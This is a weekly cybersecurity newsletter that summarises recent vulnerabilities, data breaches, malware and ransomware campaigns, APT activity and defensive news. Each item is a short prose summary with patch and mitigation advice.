Welcome back to VulnVerse! It's our fourth weekly dispatch, and we’re here to deliver another power-packed edition. Let’s dive into the latest vulnerabilities, exploits, and cyber threats.
Contents
Vulnerabilities and Exploits:1 to 24
Data Breaches:25 to 34
Malware and Ransomware:35 to 41
Software and System Issues:42 to 44
Cybersecurity Measures and Recommendations:45 to 49
Advanced Persistent Threats (APT):50 to 55
Vulnerabilities and Exploits
First up, we’re diving into the freshest vulnerabilities and exploits. Here’s what you need to know to stay armed and dangerous:
CVE-2024-39907: SQL Injection Vulnerability in 1Panel [1]
A critical SQL injection vulnerability (CVE-2024-39907) in 1Panel allows remote code execution and arbitrary file writes. With a CVSS score of 9.8, this flaw impacts version v1.10.9-tls. Users should upgrade to v1.10.12-tls immediately due to an available public proof-of-concept (PoC).
XXE Vulnerability in Laravel v11.x (CVE-2024-40075) [2]
A significant XXE vulnerability (CVE-2024-40075) has been found in Laravel v11.x, allowing attackers to execute arbitrary commands. This flaw is linked to the __destruct function in the Monolog\Handler\Handler class. Users should update to the latest version to secure their applications.
Docker Vulnerability [3]
A severe Docker Engine vulnerability, CVE-2024-41110, allows attackers to bypass authentication via crafted API requests, leading to unauthorized actions. Docker has released patches, and users should update immediately. If updates aren't possible, disable AuthZ plugins and restrict API access. Regular updates and security vigilance are essential.
LiteSpeed Cache Plugin Vulnerability [4]
A vulnerability (CVE-2024-3246) in the LiteSpeed Cache plugin for WordPress could allow attackers to inject malicious code via CSRF attacks. The flaw affects over 5 million websites. Administrators should update to version 6.3 to mitigate risks. Regular updates and security best practices are essential to protect websites from such vulnerabilities.
Telegram Zero-Day Allowed Sending Malicious Android APKs as Videos [5]
A zero-day vulnerability in Telegram for Android allowed attackers to send malicious APK files disguised as videos. ESET researchers discovered the flaw, which was patched in version 10.14.5. Users should update to the latest version and scan their devices for malicious files. This incident underscores the importance of timely software updates and vigilant monitoring of application vulnerabilities.
BIND DNS Vulnerabilities [6]
Multiple vulnerabilities in BIND 9 software could allow attackers to destabilize DNS servers, leading to denial-of-service conditions. Critical vulnerabilities include CVE-2024-0760, allowing remote attacks via DNS messages. ISC has released patches for affected versions (9.16.0 to 9.16.36, 9.18.0 to 9.18.10, and 9.19.0 to 9.19.8). Users should update to the latest versions immediately and back up configurations before applying patches to ensure DNS service stability.
GitLab XSS Vulnerability [7]
GitLab patched a high-severity cross-site scripting (XSS) vulnerability (CVE-2024-5067) affecting versions 16.6 to 17.2.1, allowing attackers to execute arbitrary scripts. Updated versions 17.2.1, 17.1.3, and 17.0.5 address this and other vulnerabilities. Users should update their GitLab installations promptly. Regular security audits and following best practices in coding can mitigate the risks of XSS and other vulnerabilities.
Progress Telerik Report Server Vulnerability CVE-2024-6327 [8]
A critical flaw in Progress Telerik Report Server (CVE-2024-6327) allows remote code execution due to insecure deserialization. Rated with a CVSS score of 9.9, it affects versions before 2024 Q2 (10.1.24.709). Progress Software has released an update to address the issue, urging users to upgrade immediately. A temporary mitigation involves changing the Report Server Application Pool user account to one with limited permissions. Users should verify their current version and update as necessary.
Windows File Immutability Vulnerability [9]
A newly discovered vulnerability in the Windows 11 Kernel, termed "File Immutability," allows threat actors to execute arbitrary code with Kernel privileges. The vulnerability exploits incorrect assumptions in the Core Windows feature design. Organizations must employ comprehensive security measures, including secure remote access and regular vulnerability assessments, to mitigate such risks.
OpenStack Nova Vulnerability Allows Hackers Gain Unauthorized Access to Cloud Servers [10]
A critical vulnerability (CVE-2024-40767) in OpenStack's Nova allows authenticated users to gain unauthorized server access using crafted image files. Discovered by Arnaud Morin of OVH, it affects specific Nova versions; urgent patching is necessary to prevent security breaches.
Windows Hello for Business Authentication Bypass [11]
A design flaw in Microsoft’s Windows Hello for Business allowed attackers to bypass secure authentication by downgrading to less secure methods. Discovered by Yehuda Smirnov, the exploit intercepts and alters authentication requests. Microsoft advises implementing conditional access policies, strong MFA, and monitoring to mitigate this vulnerability.
ConfusedFunction Vulnerability in Google Cloud Platform Let Attackers Escalate Privileges [12]
A vulnerability known as "ConfusedFunction" in Google Cloud Platform's Cloud Functions and Cloud Build services could allow attackers to escalate privileges and access various GCP services. Discovered by Tenable Research, this flaw arises from excessive permissions of the default Cloud Build service account. Google has partially remediated the issue for accounts created after mid-June 2024. Users should replace legacy Cloud Build service accounts with least-privilege accounts and monitor their environments for potential exploitation.
PKfail Vulnerability Allows Hackers to Install UEFI Malware on Over 200 Device Models [13]
The PKfail vulnerability compromises over 200 device models by exploiting untrusted Platform Keys (PKs) used in the UEFI Secure Boot process. This issue allows attackers to bypass Secure Boot and install persistent malware. Affected vendors include Acer, Dell, Fujitsu, HP, Intel, Lenovo, and Supermicro. Device vendors should replace test keys with securely generated ones and issue firmware updates. Users must apply these updates and use tools like the PKfail scanner to detect vulnerabilities.
CVE-2024-40897: Vulnerability in Orc Compiler Opens Door to Code Execution Attacks [14]
A critical vulnerability (CVE-2024-40897) in the Orc compiler has been disclosed, which could enable attackers to execute arbitrary code. The flaw, caused by a stack-based buffer overflow error, is of particular concern for developers and CI environments. The Orc project maintainers have released version 0.4.39 to address this issue. Developers are strongly advised to update immediately to prevent potential exploitation and ensure the integrity of their development environments.
Critical ServiceNow RCE flaws actively exploited to steal credentials [15]
Threat actors are exploiting ServiceNow flaws, specifically CVE-2024-4879, CVE-2024-5178, and CVE-2024-5217, to breach systems and steal credentials. These exploits allow remote code execution and database access. Although patches were released on July 10, many systems remain vulnerable. Organizations should immediately apply the patches to prevent data theft and further exploitation. Regular updates and monitoring for signs of compromise are essential to maintaining security
BookingPress WordPress Plugin Vulnerabilities [16]
The BookingPress WordPress plugin has multiple vulnerabilities allowing authenticated attackers to create arbitrary files, update site options, and upload arbitrary files, leading to potential site compromise. Affected versions are up to 1.1.5. Users should update to version 1.1.6 and apply security measures like using Wordfence, enforcing least privilege principles, and regularly updating software to protect against these exploits.
GraphQL Security Report 2024: 69% of API Services Were Susceptible to DoS Attacks [17]
A report on GraphQL security reveals significant vulnerabilities, including unrestricted resource consumption, security misconfigurations, and exposed secrets. To improve security, organizations should implement access control, input validation, rate limiting, and schema whitelisting. Adopting these best practices can help protect against DoS attacks and other threats.
JetBrains TeamCity Vulnerability [18]
A high-severity vulnerability (CVE-2024-41827) in JetBrains TeamCity allows deleted or expired access tokens to remain functional, posing significant risks to CI/CD systems. Users must update to the latest version and enhance monitoring and detection to mitigate potential unauthorized access and privilege escalation. Immediate patching is crucial to protect sensitive information and maintain system integrity.
Progress warns of critical RCE bug in Telerik Report Server [19]
Progress Software has flagged a serious remote code execution vulnerability in Telerik Report Server (CVE-2024-6327). This issue stems from insecure deserialization of untrusted data, enabling attackers to execute malicious code on vulnerable servers. Versions affected include Report Server 2024 Q2 (10.1.24.514) and earlier. Users are urged to upgrade to version 2024 Q2 (10.1.24.709) or apply temporary mitigations.
Siemens Patches Critical Vulnerabilities in SICAM Products [20]
Siemens has released crucial firmware updates to fix critical security flaws in its SICAM products, including unauthorized password resets and firmware downgrade vulnerabilities. These issues could lead to privilege escalation and data leaks. Affected products include SICAM A8000 and SICAM EGS. Siemens advises users to update their firmware and enhance security measures by disabling auto-login and securing network access with firewalls.
MonoSwap Hack [21]
MonoSwap, a liquidity protocol, suffered a hack after a developer installed a phishing app, leading to significant loss of staked liquidity. The attackers gained access to wallets and contracts via a botnet. MonoSwap's inadequate security measures, such as lack of audits and over-reliance on a single executive’s access, contributed to the breach. Strengthening security protocols, conducting regular audits, and distributing critical access can help prevent similar incidents.
Hackers Abuse Swap File In Shopping Sites To Inject Credit Card Skimmer [22]
Hackers exploited the swap file mechanism in Magento e-commerce platforms to inject persistent credit card skimmers. This method allows malware to survive multiple removal attempts. To counter this, e-commerce sites should deploy comprehensive security measures, restrict administrative access, use firewalls, and regularly update their systems and plugins to detect and remove such malware.
Threat Actors Using Telegram APIs To Steal Login Credentials [23]
Threat actors are exploiting Telegram APIs to steal login credentials through phishing emails and deceptive landing pages. These pages use JavaScript to exfiltrate user data to Telegram bots. Users should avoid clicking on suspicious links, employ robust email filtering, and educate employees about phishing risks. Organizations should implement multi-factor authentication and monitor for unusual activity to mitigate the impact of such attacks.
Hackers Bypass Secure Email Gateways [24]
Hackers have exploited vulnerabilities in Secure Email Gateways (SEGs) by sending corrupted .zip archives, allowing malware like FormBook to bypass detection. These archives contain HTML files with .Mpeg extensions, evading SEG scans. Organizations should enhance SEG configurations, monitor for unusual file types, and educate employees about the risks of opening suspicious attachments.
Data Breaches
Next, we wade through the murky waters of recent data breaches. These aren’t just headlines – they’re crucial lessons on what can go wrong and how to bolster your defenses.
Red Art Games Hit by Major Cyberattack, Customer Data Exposed [25]
Red Art Games has suffered a large-scale cyberattack, compromising customer data including names, birth dates, email addresses, shipping information, and phone numbers. Order processing is suspended during the investigation. Banking information remains secure. Customers should change their account passwords and stay alert for phishing attempts.
10 Million Users Compromised in Z-Library Phishing Site Hack [26]
The popular pirate e-book site Z-Library, or its phishing clone Z-lib, suffered a data breach affecting nearly 10 million users. Cybernews discovered an exposed database containing information on 9,761,948 users, including personal information, passwords, cryptocurrency wallet addresses, and payment details. The breach occurred due to the cybercriminals’ web server having directory listing enabled. Affected users are advised to change passwords, block malicious email addresses, and secure their cryptocurrency wallets.
Hackers Leak Sensitive Documents from Major Pentagon IT Contractor, Leidos [27]
Cybercriminals have leaked internal documents stolen from Leidos Holdings Inc., a major IT service provider for the U.S. government. The documents were stolen due to a previously disclosed breach of Diligent Corp.’s system. This incident did not impact Leidos' network or any confidential client data. The data leak has raised concerns due to Leidos' extensive work with the Department of Defense, the Department of Homeland Security, and NASA.
Michigan Medicine Data Breach [28]
Michigan Medicine experienced a data breach affecting 57,000 patients, exposing personal and health information through compromised employee email accounts. The organization has notified affected individuals and taken measures to block the attackers' IP and reset passwords. Patients should monitor their accounts for suspicious activity. Organizations should strengthen email security and employee training to prevent similar breaches.
Leidos Data Breach [29]
Hackers leaked documents from Leidos Holdings, a major IT services provider to the U.S. government. The breach, linked to a 2022 incident involving Diligent Corp., raises concerns over the security of sensitive government data managed by third-party contractors. Leidos is investigating the breach and emphasizes that its network and sensitive customer data were not affected.
Record Cyberattack: Suffolk County's $25.7M Recovery Plan [30]
Suffolk County, New York, has approved $25.7 million for recovery efforts following a cyberattack by the ALPHV/BlackCat group. The attack exposed personal data of 470,000 residents and 26,000 employees. Recovery includes contracts through the end of 2024 and significant expenses directed towards system support and forensic investigations.
Verizon to Pay $16 Million in TracFone Data Breach Settlement [31]
Verizon agreed to a $16 million settlement over data breaches at its subsidiary TracFone. The breaches involved unauthorized access to customer data and SIM-swapping incidents. Verizon will implement enhanced security measures, including API vulnerability reduction and SIM change protections, to safeguard customer information.
Greece’s Land Registry Breach [32]
Greece’s Land Registry faced a data breach after 400 cyberattacks, resulting in the theft of 1.2 GB of non-sensitive administrative data. The agency blocked further data exfiltration attempts and implemented emergency measures like VPN access termination and mandatory two-factor authentication. Enhancing cybersecurity defenses and monitoring for ongoing threats is crucial to prevent similar breaches.
dYdX Website Compromised [33]
The website for dYdX's v3 trading platform was compromised in a DNS hijacking attack, leading users to a phishing site that attempted to steal tokens. The attack exploited vulnerabilities in the Squarespace registrar used by the platform. dYdX has regained control and advises users to restart browsers and clear caches. This incident highlights the importance of robust domain security practices and prompt incident response.
Extensive spyware compromise revealed by Spytech breach [34]
A breach at Spytech exposed data from over 10,000 devices compromised with Realtime-Spy and SpyAgent spyware tools. The incident revealed unencrypted activity logs and affected devices, predominantly in the U.S. and Europe. Spytech is investigating the breach. Users should verify their devices and utilize tools like Have I Been Pwned to check for exposure. Strong security practices and regular updates are essential to prevent spyware infections.
Malware and Ransomware
Get ready to explore the dangerous world of malware and ransomware. These threats are constantly changing, and knowing the latest can help you avoid a security disaster.
Malicious Stealer Campaign Exploits Windows SmartScreen Flaw (CVE-2024-21412) [35]
FortiGuard Labs identified a campaign leveraging CVE-2024-21412 to deliver information-stealing malware, bypassing Windows SmartScreen. The attack chain includes downloading an LNK file that leads to an executable with a malicious script, injecting final stealer malware like Meduza and ACR. Organizations must prioritize patching vulnerabilities, deploying advanced threat detection systems, and educating users about the risks of interacting with unknown links and files.
FrostyGoop Malware Attack in Ukraine [36]
In January 2024, Russian-linked FrostyGoop malware cut off heating for 600 buildings in Lviv, Ukraine, during sub-zero temperatures. The attackers exploited a Mikrotik router vulnerability, breaching the network nearly a year before the attack. The malware targeted industrial control systems using the Modbus protocol. It highlights the need for improved network segmentation and adherence to SANS 5 Critical Controls, including secure remote access and ICS network visibility.
Krampus Loader [37]
The Krampus loader, a new malware gaining popularity on the dark web, supports multiple functionalities like archiving, PowerShell scripts, and cryptocurrency mining. It evades detection by altering code on each build. Cybersecurity experts urge organizations to update security protocols and employ advanced threat detection systems. Staying informed about emerging threats and implementing proactive cybersecurity measures are essential to protect digital assets from sophisticated malware loaders like Krampus.
EvolvedAim Developer Exposed as Malware Distributor [38]
The developer of EvolvedAim, a cheat program for the game Escape From Tarkov, has been exposed for distributing malware that stole user information. Known as Mythical, the developer embedded malicious software in the cheat to steal data from users' devices, including passwords and crypto wallet files. EvolvedAim has been shut down, and Mythical has been banned from gaming forums. This case highlights the risks associated with using game cheats and the severe repercussions for both developers and users involved in such activities.
Ransomware Attack Forces Closure of LA County Courts [39]
A ransomware attack on the Superior Court of Los Angeles County led to the closure of 36 courts to restore systems. The attack compromised external and internal case management systems. The court is collaborating with local, state, and federal agencies to investigate the incident.
RA Ransomware Group Aggressively Attacking Manufacturing Sector [40]
RA World ransomware group, active since March 2024, targets the manufacturing sector using multi-extortion tactics. The group has shifted from healthcare to manufacturing, seeking higher ransom payouts. To defend against such attacks, organizations should secure internet-facing servers, implement strong access controls, and maintain regular data backups. Enhanced threat detection and response capabilities are also critical.
Stargazers Ghost Network [41]
Check Point researchers have discovered the Stargazers Ghost Network, a sophisticated network of GitHub accounts distributing malware and phishing links. Operated by Stargazer Goblin, the network uses over 3,000 accounts to create repositories with malicious links and encrypted archives, appearing legitimate through automated activities like starring and forking. This Distribution as a Service (DaaS) has been active since mid-2023, with significant activity in mid-2024. Users should be cautious of repositories with unusually high activity and ensure robust cybersecurity measures, including regular monitoring and verification of repository content.
Sofware and System Issues
Even the most secure systems can have problems. Here’s a look at recent software and system issues you need to know about. Stay informed and stay prepared.
OpenBSD Introduces Hardware Acceleration [42]
OpenBSD has rolled out hardware acceleration support in its latest major update, significantly enhancing performance for desktop users. The update includes video acceleration (VA-API) and integration with the libva 2.22.0 open-source library. This allows the GPU to handle hardware encoding and decoding, improving performance and battery life in browsers like Chrome and Firefox.
Windows 10 KB5040525 Update [43]
Microsoft released the July 2024 preview update for Windows 10, fixing issues with Windows Defender Application Control (WDAC) that caused app crashes and memory leaks. Users are encouraged to install the update to enhance system stability and security. This update is crucial for maintaining optimal system performance and preventing potential security vulnerabilities.
Windows 11 KB5040527 update fixes Windows Backup failures [44]
Microsoft's KB5040527 update for Windows 11 fixes issues causing Windows backups to fail on EFI systems and addresses upgrade failures and memory leaks in Windows Defender Application Control. Users can install this optional update via Windows Update or manually download it. This update also adds drivers to the Windows Kernel Vulnerable Driver Blocklist to prevent Bring Your Own Vulnerable Driver (BYOVD) attacks. Microsoft recommends updating to the latest version to ensure continued security and functionality.
Cybersecurity Measures, Recommendations and Law
What can you do about all these threats? Here are some top cybersecurity tips and recommendations to keep you one step ahead of the bad guys.
IPFire Fortifies Against SYN Flood Attacks with New Protection Feature [45]
IPFire, the open-source firewall distribution, has introduced SYN Flood Protection for its enterprise users. This feature leverages advanced SYN cookie technology to distinguish between genuine and malicious traffic, effectively filtering out illegitimate SYN packets. IPFire supports Amazon’s Graviton Instances and Elastic Network adapters, enabling high-performance, cloud-based DoS protection capable of handling hundreds of gigabits of traffic per second.
Let’s Encrypt to End OCSP Support [46]
Let’s Encrypt plans to discontinue OCSP support in favor of CRLs, enhancing user privacy and operational efficiency. Users relying on OCSP should transition to CRLs and ensure their systems are compatible with certificates lacking an OCSP URL.
Linx Security Raises $33M to Address Digital Identity Threats [47]
Linx Security raised $33 million to enhance identity security technology, which reduces attack surfaces by mapping and monitoring user identities, access, and permissions. Their advanced analytics help mitigate risks, such as detecting and revoking unsecured access to critical systems, ensuring better compliance and security.
How Cyber Insurance Coverage is Evolving [48]
Cyber insurance is evolving to improve organizational cybersecurity postures. Despite its benefits, only a quarter of companies have standalone policies due to cost and coverage concerns. Cyber insurance now includes AI-related risks and personal insurance for smart devices. Organizations should align cyber insurance with security policies and consider it as part of a broader risk mitigation strategy.
Social Media and Travel: Be Careful of What You Share [49]
Oversharing travel details on social media can alert criminals to your absence, increasing burglary risks. Users should schedule content, use privacy settings, disable geo-tagging, and limit audience visibility to enhance security while traveling.
Advanced Persistent Threats (APT)
Finally, we focus on Advanced Persistent Threats (APTs). These are long-term, sneaky cyber-attacks that need a deep understanding to stop. Learn how to protect yourself from these persistent threats.
Espionage Group Daggerfly Revamps Toolset, Expands Targets in Wake of Malware Exposure [50]
The espionage group Daggerfly, also known as Evasive Panda, has updated its cyber arsenal, including a new malware family based on the MgBot modular framework and a new version of the Macma macOS backdoor. These updates are likely in response to the public disclosure of older variants. The group targets organizations in Taiwan and a U.S. NGO based in China. Daggerfly’s tools include the Macma backdoor and a new Windows backdoor, Trojan.Suzafk.
Patchwork Group Expands Cyber Espionage with Advanced Tools [51]
The Patchwork group, targeting Bhutan, used updated backdoor PGoShell and new tool Brute Ratel C4. The attack involved distributing a decoy file and downloading malicious components. The group targets governmental and defense organizations in East and South Asia. Patchwork’s tools include Brute Ratel C4 for managing file systems, port scanning, and capturing screens, and PGoShell with remote control and screen capture capabilities.
Kimsuky APT: New TTPs Revealed in Rapid7 Cybersecurity Report [52]
Rapid7’s report reveals Kimsuky APT’s advanced tactics, using phishing and social engineering to target government and research sectors. Key methods include LNK and CHM files for payloads. Organizations should enhance email security and train staff on social engineering defenses.
North Korean APT45 Hackers, Long Running Digital Military Since 2009 [53]
The FBI and Mandiant have identified North Korean hacking group APT45, active since 2009, targeting U.S. government agencies and critical infrastructure, supporting North Korea's military and nuclear programs through espionage and ransomware attacks.
Experts Uncover Chinese Cybercrime Network Behind Gambling and Human Trafficking [54]
A Chinese cybercrime network involved in gambling and human trafficking uses advanced DNS and traffic systems. Organizations should boost DNS security, monitor for suspicious activities, and work with law enforcement. Implementing multi-layered security and educating employees on cyber threats are crucial to combating these complex operations.
Researchers Uncover Massive Quad7 Botnet Targeting Microsoft 365 [55]
Sekoia.io and Intrinsec have analyzed the Quad7 botnet, which targets Microsoft 365 accounts using TCP port 7777 on infected routers. The botnet's number of unique IP addresses has decreased, but it continues to evolve, mainly targeting TP-Link routers. The botnet uses password spraying attacks on Microsoft 365 accounts, and researchers urge companies to help solve remaining mysteries related to the botnet.
That’s it for this week! We've covered the latest vulnerabilities, exploits, data breaches, malware, ransomware, APTs, and some practical cybersecurity tips. Stay informed and keep your systems secure.
Have any questions, comments, or feedback? Feel free to reply directly, I'd love to hear from you!
If you find this newsletter helpful and think others would too, please consider forwarding it to them. 🙏
Thanks for reading!
exit(0);
@in/kurozy